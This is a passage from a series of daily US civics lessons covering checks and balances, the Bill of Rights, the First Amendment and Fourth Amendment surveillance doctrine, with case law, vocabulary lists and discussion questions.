Thermal imaging of homes (yes, Kyllo v. United States, 2001)
GPS trackers on cars (yes, United States v. Jones, 2012)
Stingrays (fake cell towers gathering phone data) (unclear)
Facial recognition (unclear)
AI analysis of public data (unclear)

Third-Party Doctrine: You have no reasonable expectation of privacy in data you voluntarily give to third parties. So police can get your:

Bank records
Phone records (who you called, when, how long)
Email metadata
Location data from your phone company

Without a warrant. Critics say this doctrine, from the 1970s, makes no sense when we must use these services for modern life.

National Security Exception: After 9/11, surveillance expanded dramatically. NSA collected metadata on millions of Americans. Warrantless wiretaps. FISA courts approve almost all government surveillance requests in secret. Does national security justify Fourth Amendment violations?

Evaluate: Balancing Security and Liberty

These three amendments share a theme: protecting citizens from government intrusion. But every protection comes with a cost:

Second Amendment:

Liberty perspective: An armed citizenry prevents tyranny and enables self-defense
Security perspective: Easy access to guns causes 45,000+ gun deaths annually
The debate: Where’s the line between reasonable regulation and infringement?

Fourth Amendment:

Liberty perspective: Privacy is essential to freedom; surveillance chills dissent
Security perspective: Crime and terrorism require investigation and surveillance
The debate: How much privacy should we sacrifice for security?

Benjamin Franklin wrote: “Those who would give up essential Liberty, to purchase a little temporary Safety, deserve neither Liberty nor Safety.” But what counts as “essential” liberty? And what’s “temporary” versus permanent safety?

The Modern Dilemma:
Technology has made perfect surveillance possible. Governments can track location, monitor communications, use facial recognition, predict behavior. Should they?

The framers couldn’t imagine this world. But their principle remains: government must justify intrusion into private life. The burden is on the state to show cause, not on citizens to prove innocence.

Key Vocabulary

Militia: In 1791, all able-bodied men capable of military service; today, often interpreted as National Guard
Quartering: Forcing citizens to house soldiers
Probable Cause: Specific reason to believe a crime was committed
Warrant: Court order authorizing search or arrest
Reasonable Expectation of Privacy: Legal test for Fourth Amendment protection

Think About It

Your phone contains your entire life: messages, photos, location history, web searches, financial data. Should police need a warrant to search it? What if you’re suspected of terrorism? Where’s the line?

Additional Resources

Primary Source: Read Amendments 2-4:
https://www.archives.gov/founding-docs/bill-of-rights-transcript

Notice how the Fourth Amendment requires warrants to be “particular”—no general warrants like Britain used. This specificity requirement is crucial.

For the Second Amendment debate, read District of Columbia v. Heller (2008):
https://www.supremecourt.gov/opinions/07pdf/07-290.pdf

Justice Scalia’s majority opinion analyzes the original meaning of every word. Justice Stevens’s dissent argues for the collective right interpretation. Both cite the same historical sources but reach opposite conclusions.

Tomorrow: We’ll examine Amendments 5-8, protecting the rights of the accused—how the Constitution ensures fair trials and prevents government abuse of power.

November 18, 2025November 6, 2025

Day 23: First Amendment – Five Essential Freedoms

Engage: Forty-Five Words That Changed the World

“Congress shall make no law respecting an establishment of religion, or prohibiting the free exercise thereof; or abridging the freedom of speech, or of the press; or the right of the people peaceably to assemble, and to petition the Government for a redress of grievances.”

Just 45 words. But they protect five distinct freedoms that define American democracy. And every single word has been debated, litigated, and fought over for 230+ years.

Explore: The Five Freedoms

1. Freedom of Religion (Two Clauses):

Establishment Clause: “Congress shall make no law respecting an establishment of religion”

No official state religion
Government can’t favor one religion over others
But how separate must church and state be?

Free Exercise Clause: “or prohibiting the free exercise thereof”

People can practice their religion
But can religious belief justify violating laws? (polygamy, drug use, refusing medical care for children?)

2. Freedom of Speech: “or abridging the freedom of speech”

Citizens can criticize government without punishment
But are there limits? Threats? False speech? Obscenity?

3. Freedom of the Press: “or of the press”

Media can report news and opinions without censorship
But can they publish state secrets? Defame people? Violate privacy?

4. Freedom of Assembly: “or the right of the people peaceably to assemble”

People can gather for protests, meetings, demonstrations
But what about violent protests? Blocking traffic? Trespassing?

5. Freedom to Petition: “and to petition the Government for a redress of grievances”

Citizens can demand government action or change
Includes lobbying, lawsuits, complaints
But what about foreign lobbying? Corporate influence?

Explain: Why These Five?

These freedoms address specific colonial grievances:

Religion: British Crown imposed the Church of England. Dissenters (Quakers, Catholics, Baptists) faced persecution. Many colonists came to America seeking religious freedom, only to have colonies establish their own official religions.

Speech: British law punished “seditious libel”—criticizing the King or government. Truth was no defense. John Peter Zenger’s 1735 trial (where he was acquitted for printing criticism) became a defining moment for press freedom.

Press: British authorities censored newspapers, required licenses, and prosecuted editors who criticized government.

Assembly: British banned town meetings, dispersed gatherings with troops, and prohibited colonists from organizing politically.

Petition: Colonists sent petitions to Parliament and King George III seeking redress. They were ignored or led to prosecution. The Declaration of Independence lists this as a grievance: “In every stage of these Oppressions We have Petitioned for Redress in the most humble terms: Our repeated Petitions have been answered only by repeated injury.”

Elaborate: Where Rights Collide

The First Amendment seems absolute: “no law.” But in practice, all rights have limits:

Speech Limitations:

Incitement: Speech that directly causes imminent lawless action (Brandenburg v. Ohio, 1969)
True threats: Genuine threats of violence
Obscenity: Material lacking serious value (defined in Miller v. California, 1973)
Defamation: False statements harming reputation (New York Times v. Sullivan, 1964 raised the bar for public figures)
Fighting words: Words that by their nature inflict injury or provoke violence

But political speech—even offensive, radical, or false political speech—receives the highest protection. “I disapprove of what you say, but I will defend to the death your right to say it” captures the American approach.

Religion Limitations:

Can’t commit crimes in the name of religion (human sacrifice, polygamy)
Can’t deny children medical care causing death
Must still pay taxes even if religiously opposed
But government can’t target religion (Church of Lukumi Babalu Aye v. Hialeah, 1993)

Press Limitations:

Can be sued for defamation if false and malicious
Can’t publish certain classified information (though rarely prosecuted)
Subject to generally applicable laws (trespassing, contracts)
But government can almost never impose “prior restraint” preventing publication (Near v. Minnesota, 1931)

Modern Dilemmas:

Campaign Finance: Is spending money on political campaigns “speech”? Citizens United v. FEC (2010) said yes, allowing unlimited corporate and union spending. Critics say this corrupts democracy; defenders say limiting spending limits speech.

Social Media: Can government compel platforms to host speech they oppose? Can platforms censor speech without violating the First Amendment? (Currently: platforms are private companies, not bound by First Amendment, but this is debated.)

Hate Speech: America protects hate speech more than most democracies. Europe criminalizes Holocaust denial, hate speech, Nazi symbols. America protects even this speech unless it crosses into incitement or threats. Which approach better protects liberty?

School Speech: Students have First Amendment rights, but schools can restrict speech that substantially disrupts education (Tinker v. Des Moines, 1969). But where’s the line?

Evaluate: America’s First Freedom

Why does the First Amendment come first? Some argue it’s the most important—without these freedoms, people can’t hold government accountable. Others note it simply came first in Madison’s list.

The American Exception:
The United States protects speech more absolutely than any other democracy:

European countries ban hate speech, Holocaust denial
Britain has restrictive libel laws
Canada has hate speech laws and compelled speech laws
Many democracies restrict blasphemy or insulting religion

America’s approach: counter bad speech with more speech, not censorship. The answer to offensive ideas is argument and refutation, not suppression. This creates a rough, sometimes offensive public discourse—but the alternative is government deciding what citizens can say.

When Free Speech Feels Dangerous:
Every generation faces speech it considers intolerable:

1790s: Criticizing the government (Alien and Sedition Acts)
1910s: Opposing World War I
1950s: Communist sympathies
1960s: Civil rights advocacy and anti-war protests
2020s: “Misinformation” about COVID, elections, etc.

In each era, calls arise to restrict dangerous speech. The First Amendment forces us to be uncomfortable—to allow speech we hate because we don’t trust government to decide what we can say.

Key Vocabulary

Establishment Clause: Prohibits government from establishing official religion
Free Exercise Clause: Protects religious practice
Prior Restraint: Government censorship before publication (almost always unconstitutional)
Incitement: Speech directly causing imminent lawless action (not protected)
Defamation: False statement harming reputation (not fully protected)

Think About It

Should social media platforms be treated as public forums required to allow all legal speech? Or as private companies free to set their own rules? What are the tradeoffs of each approach?

Additional Resources

Primary Source: Read the First Amendment in context:
https://www.archives.gov/founding-docs/bill-of-rights-transcript

Notice it says “Congress shall make no law”—originally this limited only federal government, not states. Massachusetts had an established Congregationalist church until 1833. Not until the 20th century did the Supreme Court apply First Amendment to states via the 14th Amendment.

Read Schenck v. United States (1919) for Oliver Wendell Holmes’s famous “clear and present danger” test and the often-misquoted “fire in a crowded theater” line.

Tomorrow: We’ll explore Amendments 2-4, protecting security, arms, privacy, and property from government intrusion.

November 17, 2025November 6, 2025

Day 22: The Bill of Rights – Keeping the Promise

Engage: The Promise That Saved the Constitution

September 1787: The Constitution is signed and sent to states for ratification. Immediately, opposition erupts. George Mason, who helped write the Constitution, refuses to sign. His reason? “There is no Declaration of Rights.”

Mason wasn’t alone. Patrick Henry thundered in Virginia: “The necessity of a Bill of Rights appears to me to be greater in this government than ever it was in any government before.” Samuel Adams demanded protections in Massachusetts. New York nearly rejected the Constitution over this issue.

The Federalists—Hamilton, Madison, Jay—argued a bill of rights was unnecessary and even dangerous. But they lost the argument in the court of public opinion. To secure ratification, they made a promise: pass the Constitution now, and we’ll add a bill of rights immediately. That promise became the first ten amendments.

Explore: Why No Bill of Rights Originally?

The Federalists offered three arguments against a bill of rights:

1. It’s Unnecessary:
The Constitution creates a government of limited, enumerated powers. It can only do what’s explicitly authorized. Since it’s not given power to restrict speech or religion, it can’t do so. Why prohibit what’s already impossible?

2. It’s Dangerous:
Alexander Hamilton in Federalist No. 84 argued that listing rights implies everything not listed can be violated. Why declare “Congress shall make no law abridging freedom of speech” if Congress has no power over speech anyway? The declaration suggests power exists.

3. State Constitutions Already Have Them:
Most states had bills of rights. Since states retain most power under federalism, these state protections suffice.

The Anti-Federalists weren’t convinced. They’d seen how power expands. Parchment barriers might not stop tyranny, but they’re better than nothing. And they force government to argue against rights explicitly rather than eroding them silently.

Explain: Madison’s Change of Heart

James Madison originally opposed a bill of rights. But during Virginia’s ratification convention, he realized the Constitution couldn’t pass without one. He made a public pledge to add amendments.

After ratification, Madison kept his promise. In June 1789, he proposed amendments to the First Congress. He’d initially wanted to insert them into the Constitution’s text, but Congress decided to add them as separate amendments.

Of Madison’s proposed amendments, Congress approved 12 and sent them to states. Ten were ratified by December 15, 1791, becoming the Bill of Rights.

What Didn’t Make It:

An amendment requiring one representative for every 50,000 people (would mean 6,600+ House members today)
An amendment preventing congressional pay raises from taking effect until after an election (finally ratified in 1992 as the 27th Amendment!)

Madison designed the amendments carefully:

They limited federal government, not states (until the 14th Amendment changed this)
They protected individuals and minorities from majority tyranny
They clarified that the enumeration of rights didn’t deny others (9th Amendment)
They reserved unenumerated powers to states and people (10th Amendment)

Elaborate: Who Needed Protection and Why

The Bill of Rights responds to specific historical abuses:

First Amendment: British Crown controlled press, established official religion, prohibited assembly

Second Amendment: British attempted to seize colonial weapons at Lexington and Concord

Third Amendment: British forced colonists to house soldiers in their homes

Fourth Amendment: British used “writs of assistance” for general searches without specific cause

Fifth Amendment: British denied due process; used forced confessions; tried people multiple times for same crime

Sixth Amendment: British held secretive trials without juries; denied accused the right to confront witnesses

Seventh Amendment: British judges, not juries, decided civil cases

Eighth Amendment: British imposed cruel punishments; excessive bails and fines

Ninth Amendment: Fear that listing rights would imply others don’t exist

Tenth Amendment: Fear that federal power would eclipse state sovereignty

These weren’t abstract philosophy—they were responses to lived tyranny. The framers had experienced these abuses and wanted explicit protection.

Evaluate: Have These Rights Been Protected?

The Bill of Rights promises much. Has America delivered?

Successes:

Free press exists (even when government hates criticism)
Religious pluralism without official state religion
Criminal defendants have extensive procedural protections
Police need warrants for searches (with exceptions)
Jury trials remain for serious crimes
Government can’t quarter soldiers in homes

Failures and Limitations:

Bill of Rights didn’t apply to states until 14th Amendment (1868) and subsequent “incorporation”
Didn’t protect enslaved people, Native Americans, women from state abuses
Rights have been restricted during crises (Civil War, WWI, WWII, Cold War, War on Terror)
“Rights” are often balanced against “interests”—not absolute
Poor people often can’t effectively exercise rights (legal representation, bail)
Modern technologies raise questions framers couldn’t anticipate

The Living Debate:
Every generation argues over what these amendments mean:

Does free speech include hate speech? Campaign spending? Social media?
Does the right to bear arms mean muskets or AR-15s? For militia or individuals?
What counts as “unreasonable” searches in the digital age?
Is the death penalty “cruel and unusual”?

The Bill of Rights provides framework, not answers. Each generation must decide what these protections mean in their context.

Key Vocabulary

Bill of Rights: First ten amendments to the Constitution, ratified 1791
Individual Rights: Protections for persons against government power
Enumeration: Listing something specifically (as opposed to implied)
Ratification: Formal approval by states
Amendment: Formal change or addition to the Constitution

Think About It

If you were adding an 11th amendment to the Bill of Rights in 1791, what right would you protect? What about today—what modern right should be explicitly protected?

Additional Resources

Primary Source: Read the Bill of Rights as ratified:
https://www.archives.gov/founding-docs/bill-of-rights-transcript

Notice the phrasing: “Congress shall make no law…” This limited only federal government. State governments could restrict speech, establish religions, etc. until the 14th Amendment and incorporation doctrine changed this in the 20th century.

Also read Federalist No. 84 by Alexander Hamilton arguing against a bill of rights:
https://avalon.law.yale.edu/18th_century/fed84.asp

Hamilton lost this debate, but his concerns about enumerating rights (what about rights not listed?) led directly to the 9th Amendment.

Tomorrow: We’ll examine the First Amendment—five freedoms in 45 words that define American liberty.

November 14, 2025November 6, 2025

Day 21: Checks and Balances – How the Branches Limit Each Other

Engage: The Constitutional Chess Game

The Constitution creates a perpetual three-way chess match. Each branch has moves that limit the others. Congress passes a law; the President vetoes it; Congress overrides the veto. The President appoints a judge; the Senate rejects the nominee. Courts declare a law unconstitutional; Congress proposes an amendment. Every power has a counter-power.

This wasn’t an accident. As James Madison wrote in Federalist No. 51: “Ambition must be made to counteract ambition.” The framers didn’t trust virtue—they trusted self-interest. Make each branch jealous of its own power, and it will resist encroachment by the others.

Explore: The Web of Checks

How Congress Checks the President:

Override vetoes with 2/3 vote
Reject treaties (Senate, 2/3 required)
Reject appointments (Senate, majority required)
Impeach and remove from office (House impeaches, Senate tries)
Control the budget—no money without appropriation
Investigate executive actions
Pass laws limiting executive authority
Refuse to declare war or authorize military force

How Congress Checks the Courts:

Create (or eliminate) lower federal courts
Set jurisdiction of federal courts
Confirm or reject judicial appointments (Senate)
Impeach and remove judges
Propose constitutional amendments to override decisions
Control judicial budgets

How the President Checks Congress:

Veto legislation
Call Congress into special session
Recommend legislation (State of the Union)
Use public influence to pressure Congress
Threaten vetoes to influence legislation
Implement laws loosely or delay enforcement

How the President Checks the Courts:

Appoint judges (shape judiciary over time)
Grant pardons (nullify convictions)
Enforce (or decline to enforce) court decisions
Use executive authority to moot cases

How Courts Check Congress:

Declare laws unconstitutional (judicial review)
Interpret laws broadly or narrowly
Require congressional compliance with constitutional limits
Invalidate unconstitutional investigations

How Courts Check the President:

Declare executive actions unconstitutional
Require compliance with laws
Reject claims of absolute executive privilege
Issue injunctions blocking executive policies
Review regulations from executive agencies

Explain: Checks in Action—Historical Examples

Andrew Johnson Impeachment (1868):
Congress impeached President Johnson (House) and tried him (Senate) over Reconstruction policy. He was acquitted by one vote. The check was used but didn’t succeed—showing even unsuccessful checks constrain power. Johnson moderated his actions after impeachment.

FDR’s Court-Packing Plan (1937):
After the Supreme Court struck down New Deal programs, President Franklin Roosevelt proposed adding justices to get favorable rulings. Congress refused. The Court subsequently became more supportive of New Deal laws anyway (the “switch in time that saved nine”). The threat of a check changed behavior.

War Powers Resolution (1973):
After Vietnam, Congress passed a law requiring presidents to notify Congress within 48 hours of deploying military forces and withdraw them within 60 days without congressional authorization. Presidents claim it’s unconstitutional; Congress has rarely enforced it; courts have avoided the issue. A check that exists on paper but not in practice.

Watergate and United States v. Nixon (1974):

Congress investigated President Nixon
Courts ordered Nixon to release tapes
House began impeachment
Nixon resigned

All three branches checking executive power simultaneously.

Bill Clinton Impeachment (1998-1999):
House impeached President Clinton for perjury and obstruction related to personal conduct. Senate acquitted. Some argued impeachment was used improperly (not for official conduct). Others said checks must be available even if debatable. The question: when should checks be used, not just can they be used?

Trump Impeachments (2019, 2021):
President Trump was impeached twice by the House, acquitted twice by the Senate. Demonstrated that in a polarized environment, partisan loyalty can prevent checks from functioning. When Senate is controlled by President’s party, impeachment becomes toothless.

Elaborate: When Checks Fail

The system assumes each branch will defend its institutional prerogatives regardless of partisan alignment. But what happens when party loyalty exceeds institutional loyalty?

Modern Problems:

Partisan Polarization:
When Congress and President are the same party, Congress often rubber-stamps executive actions rather than checking them. When they’re different parties, Congress often opposes everything rather than seeking compromise.

Congressional Abdication:
Congress has delegated so much authority to executive agencies that it barely legislates anymore. It avoids tough decisions, lets the President act, then criticizes results. This maintains popularity while abandoning constitutional responsibility.

Executive Evasion:
Modern presidents use executive orders, signing statements, and administrative actions to bypass Congress. Emergency declarations expand power without congressional authorization.

Judicial Reluctance:
Courts sometimes invoke “political question doctrine” or standing requirements to avoid checking the other branches, effectively declining to use their power.

The Iran-Contra Affair (1980s):
Executive branch sold weapons to Iran, funneled money to Nicaraguan rebels, violated congressional prohibitions. Some officials were convicted; most were pardoned. Congressional check was weak; executive mostly escaped accountability.

Evaluate: Is the System Self-Correcting?

The framers designed a system where liberty would be protected by structure, not by virtue. But does it still work?

Optimistic View:

System has survived 235+ years
Watergate showed checks work even against popular presidents
Courts still strike down executive overreach
Congress can reassert power when it wants to
Elections provide ultimate check

Pessimistic View:

Checks depend on will to use them; partisanship undermines will
Executive power expands during every crisis, never fully contracts
Congress has become weak and irrelevant
Courts are increasingly political
System was designed for 18th century, struggles with modern problems

The Reality:
Checks and balances slow government but don’t prevent action. They force compromise, negotiation, and public debate. Whether this is wisdom or dysfunction depends on your view of government’s proper role.

Madison knew no system is perfect: “If men were angels, no government would be necessary. If angels were to govern men, neither external nor internal controls on government would be necessary.” Since neither condition exists, we have checks and balances—an imperfect solution to an eternal problem.

Key Vocabulary

Checks and Balances: Constitutional mechanisms allowing each branch to limit the others
Override: Congress’s ability to pass a law over presidential veto with 2/3 vote
Impeachment: House charging an official with wrongdoing; Senate tries and can remove
Judicial Review: Courts declaring laws or actions unconstitutional
Veto: President’s power to reject legislation

Think About It

If you could add one new check or balance to the Constitution, what would it be? What problem would it solve? What new problems might it create?

Additional Resources

Primary Source: Read Federalist No. 51 by James Madison:
https://avalon.law.yale.edu/18th_century/fed51.asp

This is perhaps the most important essay for understanding American constitutional design. Madison explains why you can’t rely on parchment barriers or good intentions—you must give each branch “the necessary constitutional means and personal motives to resist encroachments of the others.”

Also compare with Federalist No. 10, where Madison applies the same principle to factions:
https://avalon.law.yale.edu/18th_century/fed10.asp

Tomorrow: We’ll explore the Bill of Rights—how the Anti-Federalists forced the addition of explicit protections for individual liberty.